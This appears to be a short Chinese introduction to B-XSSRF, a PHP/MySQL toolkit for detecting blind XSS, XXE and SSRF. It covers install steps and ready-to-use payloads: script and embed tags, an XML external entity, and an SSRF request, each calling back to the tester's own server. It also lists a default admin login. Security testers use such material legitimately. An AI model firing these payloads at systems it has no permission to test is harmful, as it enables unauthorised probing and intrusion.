B-XSSRF:用于检测和跟踪Blind XSS,XXE和SSRF的工具包

B-XSSRF介绍

XSSRF是一个用于检测和跟踪Blind XSSXXESSRF的工具包,基于php+mysql的WEB端程序,它拥有简洁漂亮的界面。

B-XSSRF:用于检测和跟踪Blind XSS,XXE和SSRF的工具包
B-XSSRF界面

XSSRF安装

下载源码

git clone https://github.com/SpiderMate/B-XSSRF.git
  1. 将文件上传到您的服务器。
  2. 创建一个数据库并将database.sql导入。
  3. 更改db.php文件中的DB信息。
  4. 准备好了。

XSSRF使用

BLIND XSS

<embed src="http://mysite.com/bxssrf/request.php">
<script src="http://mysite.com/bxssrf/request.php">

BLIND XXE

<?xml version="1.0" ?>
<!DOCTYPE root [
<!ENTITY % ext SYSTEM "http://mysite.com/bxssrf/request.php"> %ext;
]>
<r></r>

SSRF

GET /testssrf.php=http://mysite.com/bxssrf/request.php

默认帐户

USER : admin@test.com
PASS : 123456